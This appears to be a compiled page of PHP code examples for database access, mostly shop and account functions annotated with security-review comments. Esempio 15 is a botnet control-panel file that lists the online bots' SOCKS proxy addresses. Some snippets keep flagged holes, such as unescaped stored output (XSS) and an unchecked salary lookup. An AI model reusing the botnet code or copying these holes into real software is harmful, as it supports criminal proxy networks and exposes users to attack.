/**
 * Delete one stored card belonging to a customer.
 *
 * Both values travel as bound statement parameters, so neither is ever
 * spliced into the SQL text.
 *
 * @param mixed $id      Value matched against cust_card.id.
 * @param mixed $card_no Value matched against cust_card.card_number.
 * @return void
 */
function _removeCustomerCard($id, $card_no)
{
    $bound = array($id, $card_no);
    $delete = ConnectToDB()->prepare("DELETE FROM cust_card WHERE id = ? AND card_number = ?");
    $delete->execute($bound);
}
Esempio n. 2
/**
 * Register one more user of the shared database connection.
 *
 * ConnectToDB() is called only while the global counter is still zero;
 * the counter is incremented on every call.
 *
 * @return void
 */
function StartAccessToDB()
{
    global $db_AccessCounter;
    // Loose comparison kept on purpose: an unset (null) counter also counts as zero.
    $first_user = ($db_AccessCounter == 0);
    if ($first_user) {
        ConnectToDB();
    }
    ++$db_AccessCounter;
}
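/**
 * Expire the stored session that belongs to a user/cookie pair.
 *
 * The cookie is hashed with grHash() and session_expiration is set to the
 * current time on the active_users row matching both the e-mail and the
 * stored session hash.
 *
 * Fix: the original passed the DateTime object to date(), which expects an
 * integer timestamp. That call fails (TypeError on PHP 8, a warning and
 * false on older versions), so the expiry written at logout was never the
 * current time. The timestamp is now produced with DateTime::format().
 *
 * @param string $user   E-mail address identifying the account.
 * @param string $cookie Raw session cookie value as presented by the client.
 * @return void
 */
function removeCookie($user, $cookie)
{
    // Only the hash is compared against the database, never the raw cookie.
    $cookie = grHash($cookie, $user);
    $today = new DateTime("now");
    $dbh = ConnectToDB();
    $stmt = $dbh->prepare("UPDATE active_users SET session_expiration=? WHERE email=? AND last_session_code=?");
    $stmt->execute(array($today->format("Y-m-d H:i:s"), $user, $cookie));
    return;
}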
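/**
 * Print one <option> element per row of the class table.
 *
 * Fixes over the original:
 *  - class_id and class_name are HTML-escaped before being written into the
 *    attribute and element body. The values come from the database, so a
 *    stored name containing a quote or a tag would otherwise become markup
 *    in every page that renders this list (stored XSS).
 *  - A failed query (query() returning false) no longer triggers a property
 *    access on a non-object; the function simply prints nothing.
 *
 * @return void
 */
function getClassesID()
{
    $db = ConnectToDB();
    $result = $db->query("SELECT * FROM class");
    if ($result) {
        while ($row = $result->fetch_assoc()) {
            // ENT_QUOTES because the value sits inside a single-quoted attribute.
            $value = htmlspecialchars((string) $row['class_id'], ENT_QUOTES | ENT_SUBSTITUTE);
            $label = htmlspecialchars((string) $row['class_name'], ENT_QUOTES | ENT_SUBSTITUTE);
            echo "<option value='" . $value . "'>" . $label . "</option>";
        }
        $result->close();
    }
    mysqli_close($db);
}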
/**
 * Echo username, department and salary of one employee as a JSON object.
 *
 * The employee id is read from $_POST['employee_id'] and bound as a
 * statement parameter. Only the first matching row is emitted; nothing is
 * printed when no row matches.
 *
 * NOTE(review): no authentication or authorization check is visible in
 * this function, and the id is chosen by the client. Confirm that the
 * caller restricts who may request another employee's salary.
 *
 * @return void
 */
function getEmployeeUsername()
{
    $requested_id = $_POST['employee_id'];
    $lookup = ConnectToDB()->prepare("SELECT * \n\t\t\tFROM login_info\n\t\t\tNATURAL JOIN employee\n\t\t\tWHERE id = ?\n\t");
    $lookup->execute(array($requested_id));
    $record = $lookup->fetch();
    if ($record) {
        echo json_encode(array(
            "username" => $record['username'],
            "work_dept" => $record['work_dept'],
            "salary" => $record['salary'],
        ));
    }
}
/**
 * Fetch every review of an item, newest first.
 *
 * @param mixed $item_id Value bound to review.item_id.
 * @return array List of arrays with the keys "date", "rating" and
 *               "comments" (taken from the text_comments column).
 */
function _getReviews($item_id)
{
    $query = ConnectToDB()->prepare("\n\t\tSELECT *\n\t\tFROM review\n\t\tWHERE item_id = ?\n\t\tORDER BY date DESC\n\t");
    $query->execute(array($item_id));
    $reviews = array();
    while ($record = $query->fetch()) {
        $reviews[] = array(
            "date" => $record["date"],
            "rating" => $record["rating"],
            "comments" => $record["text_comments"],
        );
    }
    return $reviews;
}
/**
 * List the orders purchased in a given month of a given year.
 *
 * @param mixed $month Value compared with MONTH(date_of_purchase).
 * @param mixed $year  Value compared with YEAR(date_of_purchase).
 * @return array List of arrays with the keys "date", "order_id",
 *               "customer_id" and "total".
 */
function _getMonthlySalesOrder($month, $year)
{
    $query = ConnectToDB()->prepare("\n\t\tSELECT date_of_purchase,order_id,customer_id,total_price\n\t\tFROM orders\n\t\tWHERE\n\t\tMONTH(date_of_purchase) = ?\n\t\tAND YEAR(date_of_purchase) = ?\n\t");
    $query->execute(array($month, $year));
    $orders = array();
    while ($record = $query->fetch()) {
        $orders[] = array(
            "date" => $record["date_of_purchase"],
            "order_id" => $record["order_id"],
            "customer_id" => $record["customer_id"],
            "total" => $record["total_price"],
        );
    }
    return $orders;
}
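/**
 * Search the item catalogue by title and genre and return the hits as JSON.
 *
 * Fixes over the original:
 *  - $term_str and $genre were concatenated straight into the SQL text
 *    (SQL injection). Both are now bound as LIKE parameters; any % or _
 *    wildcards the caller puts in them keep working as before.
 *  - The original then called execute() with one parameter on a statement
 *    that contained no placeholder, which is a parameter-count mismatch.
 *    The statement now has exactly the two placeholders that are bound.
 *
 * The ORDER BY clause is still chosen from a fixed list, so $order never
 * reaches the SQL text itself.
 *
 * @param string $term_str LIKE pattern for item.title.
 * @param mixed  $order    2 = price ascending, 3 = price descending,
 *                         4 = rating descending, 5 = rating ascending;
 *                         any other value leaves the result unordered.
 * @param string $genre    LIKE pattern for item.genre.
 * @return string JSON array of item objects; "avg_rating" is present only
 *                for items that have at least one review.
 */
function _searchItems($term_str, $order, $genre)
{
    $dbh = ConnectToDB();
    $sql = "\n\tSELECT item.*,avg_ratings.avg_rating \n\t\tFROM item\n\t\tLEFT JOIN (\n\t\t\tSELECT item_id,avg(rating) as avg_rating\n\t\t\tFROM review\n\t\t\tGROUP BY item_id\n\t\t) as avg_ratings\n\t\tON item.item_id = avg_ratings.item_id\n\tWHERE title LIKE ? AND genre LIKE ? ";

    // Allow-list of sort clauses; loose comparison keeps "2" and 2 equivalent
    // as in the original if/else chain.
    $order_clauses = array(
        2 => " ORDER BY price ASC",
        3 => " ORDER BY price DESC",
        4 => " ORDER BY avg_rating DESC",
        5 => " ORDER BY avg_rating ASC",
    );
    foreach ($order_clauses as $code => $clause) {
        if ($order == $code) {
            $sql = $sql . $clause;
            break;
        }
    }

    $stmt = $dbh->prepare($sql);
    $stmt->execute(array($term_str, $genre));
    $arr = array();
    while ($row = $stmt->fetch()) {
        $obj = array();
        $obj["id"] = $row["item_id"];
        $obj["title"] = $row["title"];
        $obj["description"] = $row["description"];
        $obj["genre"] = $row["genre"];
        $obj["publisher"] = $row["publisher"];
        $obj["publish_month"] = $row["publication_month"];
        $obj["publish_year"] = $row["publication_year"];
        $obj["image_url"] = $row["image_url"];
        $obj["price"] = $row["price"];
        // The LEFT JOIN yields NULL for items without reviews.
        if (isset($row["avg_rating"])) {
            $obj["avg_rating"] = $row["avg_rating"];
        }
        $arr[] = $obj;
    }
    return json_encode($arr);
}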
/**
 * Runs one UNION query against the type and scope tables and walks the
 * result; despite the name, no INSERT is issued in the lines shown.
 *
 * NOTE(review): the function takes no parameters and declares no globals,
 * yet it reads $type, $scope and $result2. None of them is assigned in this
 * scope, so the listing looks like an excerpt of a longer function. The
 * comments below describe only what the visible lines do.
 */
function insertProjects()
{
    $db = ConnectToDB();
    // NOTE(review): $type and $scope are interpolated directly into the SQL
    // text. If they are ever filled from request data this is an injection
    // point; bind them through a prepared statement instead.
    $sql = "\r\nSELECT type_id FROM type WHERE type_title ='{$type}'\r\nUNION\r\nSELECT scope_id FROM scope WHERE scope_title='{$scope}';\r\n";
    $result = $db->query($sql);
    if ($result->num_rows > 0) {
        // Collect every id returned by the UNION; the scope ids also arrive
        // under the 'type_id' key because a UNION takes its column names
        // from the first SELECT.
        while ($row = $result->fetch_assoc()) {
            $scope_type[] = $row['type_id'];
        }
    }
    // NOTE(review): $result2 is never assigned in the visible code, so this
    // branch cannot run as written.
    if ($result2->num_rows > 0) {
        // Keep the project_id of the last row.
        while ($row = $result2->fetch_assoc()) {
            $id = $row['project_id'];
        }
    }
    $result->close();
    mysqli_close($db);
}
Esempio n. 10
<?php

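// Populate $_SESSION['firstname'] for the current visitor: the stored first
// name for a validated session, "Guest" otherwise.
session_start();
// A fresh session has no 'valid' key yet; empty() treats that like false
// without raising an undefined-index notice.
if (!empty($_SESSION['valid'])) {
    $mysqli = ConnectToDB();
    if ($mysqli) {
        // The id is concatenated into the WHERE clause, so force it to an
        // integer first; whatever ended up in the session can then never be
        // read as SQL.
        $uid = isset($_SESSION['uid']) ? (int) $_SESSION['uid'] : 0;
        $users = $mysqli->query(SelectElementsWhere("*", "id = " . $uid, "users"));
        // query() returns false on failure; guard before touching the result.
        if ($users) {
            if ($users->num_rows == 1) {
                $user = $users->fetch_assoc();
                $_SESSION['firstname'] = $user['firstname'];
            }
            $users->free();
        }
    }
    // Called regardless of the connection outcome, as in the original; the
    // return value was never used there either.
    CloseDBConnection($mysqli);
} else {
    $_SESSION['firstname'] = "Guest";
}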
Esempio n. 11
<?php

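// NOTE(review): display_errors=1 sends PHP and SQL error text to the
// browser, which discloses queries and file paths; keep this for
// development only.
ini_set('display_errors', '1');
error_reporting(E_ALL);
require 'db.inc.php';
// Always define $q; the original left it undefined when the form field was
// missing.
$q = isset($_POST['search']) ? $_POST['search'] : '';
$directory = 'uploads/';
$db = ConnectToDB();
// Fix: the search term came straight from $_POST and was interpolated into
// the statement inside quotes (SQL injection). It is now bound as a
// parameter. MySQL still interprets the term as a regular expression;
// binding only stops it from changing the statement itself.
$sql = "SELECT project_name, project_description, img_url, project_id FROM project WHERE project_name REGEXP ? OR project_description REGEXP ?";
$result = false;
$stmt = $db->prepare($sql);
if ($stmt) {
    $stmt->bind_param('ss', $q, $q);
    if ($stmt->execute()) {
        // get_result() needs the mysqlnd driver, the default since PHP 5.4.
        $result = $stmt->get_result();
    }
}
$c = 0;
// Our counter
$n = 3;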
// Render the matches as a grid with $n columns per row. The listing ends
// before this loop is closed.
if ($result->num_rows > 0) {
    while ($row = $result->fetch_assoc()) {
        // Open the first row before the first cell.
        if ($c == 0) {
            echo '<div class="row">';
        }
        if ($c % $n == 0 && $c != 0) {
            // New table row
            echo '</div><div class="row">';
        }
        $c++;
        echo '<div class="col-md-4">';
        // NOTE(review): project_id, project_name, project_description and
        // img_url are written into the page exactly as stored. A value
        // containing markup or a quote becomes part of the HTML (stored
        // XSS); pass each one through htmlspecialchars() with ENT_QUOTES
        // before echoing.
        echo '<h2><a href="project.php?project=' . $row['project_id'] . '">' . $row['project_name'] . '</a></h2>';
        echo '<p>' . $row['project_description'] . '</p>';
        echo '<div class="thumbnail"><img src="' . $directory . $row['img_url'] . '" alt="" class="img-responsive"></div>';
        echo '</div>';
Esempio n. 12
/**
 * List the items in a cart whose quantity is above zero.
 *
 * @param mixed $cart_id Value bound to items_in_cart.cart_id.
 * @return array List of arrays with the keys "id", "title", "price",
 *               "quantity" and "item_total" (price * quantity, computed
 *               by the query).
 */
function _getCartItems($cart_id)
{
    $query = ConnectToDB()->prepare("\n\t\tSELECT item_id,title,price,quantity,price*quantity as item_total\n\t\tFROM item natural join items_in_cart\n\t\tWHERE cart_id = ?\n\t\tAND quantity > 0\n\t");
    $query->execute(array($cart_id));
    $lines = array();
    while ($record = $query->fetch()) {
        $lines[] = array(
            "id" => $record["item_id"],
            "title" => $record["title"],
            "price" => $record["price"],
            "quantity" => $record["quantity"],
            "item_total" => $record["item_total"],
        );
    }
    return $lines;
}
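/**
 * Record that a warehouse fulfilled part of an order and reduce its stock.
 *
 * Three writes belong together: create the items_fulfilled row if it does
 * not exist, add the quantity to it, and subtract the same quantity from
 * has_inventory.
 *
 * Fixes over the original:
 *  - The three statements were sent as one multi-statement string through a
 *    single prepare(). That only works when the driver emulates prepares
 *    and allows stacked queries, and a failure in the second or third
 *    statement went unnoticed. Each statement is now prepared on its own.
 *  - The writes run inside one transaction, so a failure part-way leaves
 *    neither the fulfilment row nor the inventory half-updated (assuming
 *    the tables use a transactional engine such as InnoDB).
 *  - The leftover print_r() of the arguments, which dumped order and
 *    warehouse ids into the response, is removed.
 *  - 1 is still returned on success; 0 is now returned when a statement
 *    reports failure instead of claiming success unconditionally.
 *
 * NOTE(review): nothing here stops has_inventory.quantity from going
 * negative; confirm that the caller or a database constraint checks stock.
 *
 * @param mixed $oid   Order id.
 * @param mixed $iid   Item id.
 * @param mixed $wid   Warehouse id.
 * @param mixed $quant Quantity fulfilled by this warehouse.
 * @return int 1 on success, 0 if any statement failed.
 */
function _fillOrder($oid, $iid, $wid, $quant)
{
    $dbh = ConnectToDB();
    $steps = array(
        array(
            "INSERT IGNORE INTO items_fulfilled(order_id,item_id,warehouse_id,quantity) VALUES(?,?,?,0)",
            array($oid, $iid, $wid),
        ),
        array(
            "UPDATE items_fulfilled SET quantity=quantity+? WHERE order_id = ? AND item_id = ? AND warehouse_id = ?",
            array($quant, $oid, $iid, $wid),
        ),
        array(
            "UPDATE has_inventory SET quantity = quantity-? WHERE warehouse_id = ? AND item_id = ?",
            array($quant, $wid, $iid),
        ),
    );

    // Do not nest: only open (and later close) a transaction if the caller
    // has not already started one on this connection.
    $own_transaction = !$dbh->inTransaction();
    if ($own_transaction) {
        $dbh->beginTransaction();
    }
    try {
        foreach ($steps as $step) {
            $stmt = $dbh->prepare($step[0]);
            // Covers connections running in silent/warning error mode.
            if ($stmt === false || $stmt->execute($step[1]) === false) {
                if ($own_transaction) {
                    $dbh->rollBack();
                }
                return 0;
            }
        }
        if ($own_transaction) {
            $dbh->commit();
        }
    } catch (Exception $e) {
        if ($own_transaction) {
            $dbh->rollBack();
        }
        throw $e;
    }
    return 1;
}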
Esempio n. 14
/**
 * Write a customer's personal details with REPLACE INTO.
 *
 * Every supplied value is bound as a parameter. A field that is unset or
 * loosely equal to "" is written as the SQL literal '' instead of being
 * bound, so the placeholder list always matches the bound values.
 *
 * @param mixed $id    Customer id (always bound).
 * @param mixed $fname First name.
 * @param mixed $mi    Middle initial.
 * @param mixed $lname Last name.
 * @param mixed $phone Phone number.
 * @param mixed $email E-mail address.
 * @return void
 */
function _updatePersonalInfo($id, $fname, $mi, $lname, $phone, $email)
{
    $dbh = ConnectToDB();
    $bound = array($id);
    $slots = array();
    // Column order: first_name, middle_initial, last_name, phone, email.
    foreach (array($fname, $mi, $lname, $phone, $email) as $value) {
        if (isset($value) && $value != "") {
            $bound[] = $value;
            $slots[] = "?";
        } else {
            $slots[] = "''";
        }
    }
    $sql = "REPLACE INTO customer(id,first_name,middle_initial,last_name,phone,email) VALUES(?," . implode(",", $slots) . ")";
    $stmt = $dbh->prepare($sql);
    $stmt->execute($bound);
}
Esempio n. 15
<?php

/*
  Retrieves the list of SOCKS proxies that are currently online.
  The file must be placed in the root of the control panel.

  NOTE(review): the table and constant names used below (botnet_list,
  bot_id, BOTNET_TIMEOUT) identify this as part of a botnet control panel.
  Treat the file as a malware artifact if it turns up on a web server. No
  login or session check appears in the visible lines.
*/
define('__CP__', 1);
require_once 'system/global.php';
// Stop silently when the panel configuration cannot be loaded; the @
// suppresses the include warning.
if (!@(include_once 'system/config.php')) {
    die;
}
// Project helpers; presumably they send no-cache and UTF-8 text/plain
// response headers (their bodies are not shown here).
HTTPNoCacheHeaders();
HTTPU8PlainHeaders();
// Select bot_id, ipv4 and port_s1 for rows with flag_nat=0 whose rtime_last
// lies within the last BOTNET_TIMEOUT seconds. Uses the legacy mysql_*
// extension, which was removed in PHP 7.
if (!ConnectToDB() || !($r = @mysql_query('SELECT bot_id, ipv4, port_s1 FROM botnet_list WHERE flag_nat=0 AND rtime_last>=' . (time() - BOTNET_TIMEOUT)))) {
    die('MySQL error: ' . mysql_error());
}
// One CRLF-terminated line per row: "<bot_id> <ipv4>:<port_s1>".
while ($m = mysql_fetch_row($r)) {
    echo "{$m[0]} {$m[1]}:{$m[2]}\r\n";
}
Esempio n. 16
/**
 * Fetch all orders placed by a customer.
 *
 * NOTE(review): each entry carries the stored card_number unchanged.
 * Confirm that callers mask it before it reaches a page or an API response.
 *
 * @param mixed $customer_id Value bound to orders.customer_id.
 * @return array List of arrays with the keys "order_id", "customer_id",
 *               "date", "total_price", "discount", "card_number" and
 *               "address_id".
 */
function _getOrders($customer_id)
{
    $query = ConnectToDB()->prepare("\n\t\tSELECT *\n\t\tFROM orders\n\t\tWHERE customer_id = ?\n\t");
    $query->execute(array($customer_id));
    $orders = array();
    while ($record = $query->fetch()) {
        $orders[] = array(
            "order_id" => $record["order_id"],
            "customer_id" => $record["customer_id"],
            "date" => $record["date_of_purchase"],
            "total_price" => $record["total_price"],
            "discount" => $record["discount"],
            "card_number" => $record["card_number"],
            "address_id" => $record["address_id"],
        );
    }
    return $orders;
}
Esempio n. 17
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title> </title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<?php 
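include "./config.php";
include "./functions.php";
$query = $_SERVER['QUERY_STRING'];
// Fix: parse_str() without a result array turned every query-string
// parameter into a variable in this scope, so a request could overwrite
// variables already set by the includes above, among them the $server,
// $user, $pw and $dbname handed to ConnectToDB(). That one-argument form no
// longer exists in PHP 8. The parameters are now parsed into an array and
// imported with EXTR_SKIP, which never replaces a variable that already
// exists.
// NOTE(review): code later in the page may rely on the imported variables,
// which is why extract() is kept; reading the expected keys from
// $query_vars explicitly would be safer still.
parse_str($query, $query_vars);
extract($query_vars, EXTR_SKIP);
ConnectToDB($server, $user, $pw, $dbname);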
?>

<style type="text/css">
<!--
@import url("./style.css");
-->
</style>

<script>
<!--
// Put the caret in the command box and scroll the log field to its end.
function setfocus()
{
	var form = document.form1;
	form.cmd.focus();
	form.logfield.scrollTop = '9999';
}
-->
</script>

</head>
Esempio n. 18
        $result = mysql_query($qs, $LinkDB);
        if ($result) {
            if (mysql_affected_rows() > 0) {
                $bOk = true;
            }
        }
    }
    return $bOk;
}
// -------------------------------------------------------------
// Create the connection.
// ConnectToDB() receives both handles plus the host, user, password and
// database name; $newLink is assigned false as part of the call.
// -------------------------------------------------------------
$DBConn = NULL;
$DBLink = NULL;
ConnectToDB($DBLink, $DBConn, $sDBHost, $sDBUser, $sDBPwd, $sDBName, $newLink = false);

// -------------------------------------------------------------
// Variable initialisation
// -------------------------------------------------------------
$chP = "checked";
$chC = "";

// -------------------------------------------------------------
// Action add/edit/delete
// -------------------------------------------------------------
$tbl = "CSCCORE_DOWN_CENTRAL_GROUP";
$recPrnt = "";
$recNm = "";
$recId = "";
// The hidden "ask" field carries the action code. base64 is an encoding,
// not a protection: the client can read and change the value freely.
$valHdnFrm = sprintf('<input type="hidden" name="ask" value="%s">', base64_encode('ad'));
Esempio n. 19
?>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr" dir="ltr">
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
        <title>Config Rename</title>
        <script type="text/javascript">
            // Return to the configuration list; replace() swaps the current
            // history entry instead of adding a new one.
            function GoBack()
            {
              window.location.replace("screenconfig.php");
            }
        </script>
    </head>
    <body>
<?php 
// Render the "rename configuration" form for the result configuration named
// by ?rcid=. The listing ends before the open blocks are closed.
$PHP_SELF = $_SERVER['PHP_SELF'];
ConnectToDB();
// intval() reduces the request value to an integer, so $rcid can be placed
// in the SQL text and in the hidden field below without further escaping.
$rcid = isset($_GET['rcid']) ? intval($_GET['rcid']) : 0;
if ($rcid > 0) {
    // NOTE(review): the two tables are listed without a join condition and
    // c.name is not used in the lines shown; confirm the intended query.
    // The mysql_* functions used here were removed in PHP 7.
    $sql = "SELECT rc.name rcname, c.name cname FROM mopcompetition c, resultconfig rc WHERE rc.rcid={$rcid}";
    $res = mysql_query($sql);
    if (mysql_num_rows($res) > 0) {
        $r = mysql_fetch_array($res);
        $rcname = $r['rcname'];
        print "<form method=GET action='screenconfig.php'>";
        print "<input type='hidden' name='action' value='update'>";
        print "<input type='hidden' name='rcid' value='{$rcid}'>";
        // NOTE(review): $rcname is a stored, user-editable name printed
        // inside a single-quoted attribute without escaping. A name
        // containing a quote breaks out of the attribute (stored XSS); wrap
        // it in htmlspecialchars() with ENT_QUOTES.
        print MyGetText(54) . " : <input type='text' name='configname' value='{$rcname}' size=64 maxlength=64><br/>";
        // New name
        print "<br/><input type='submit' value='" . MyGetText(52) . "'>&nbsp;";
        // OK
        print "<input type='button' value='" . MyGetText(53) . "' onclick='GoBack();'>";
/**
 * Link an existing address to a customer.
 *
 * Both ids are bound as statement parameters.
 *
 * @param mixed $id      Customer id stored in cust_addr.id.
 * @param mixed $addr_id Address id stored in cust_addr.address_id.
 * @return void
 */
function _addCustomerAddress($id, $addr_id)
{
    $bound = array($id, $addr_id);
    $insert = ConnectToDB()->prepare("INSERT INTO cust_addr(id,address_id) VALUES(?,?)");
    $insert->execute($bound);
}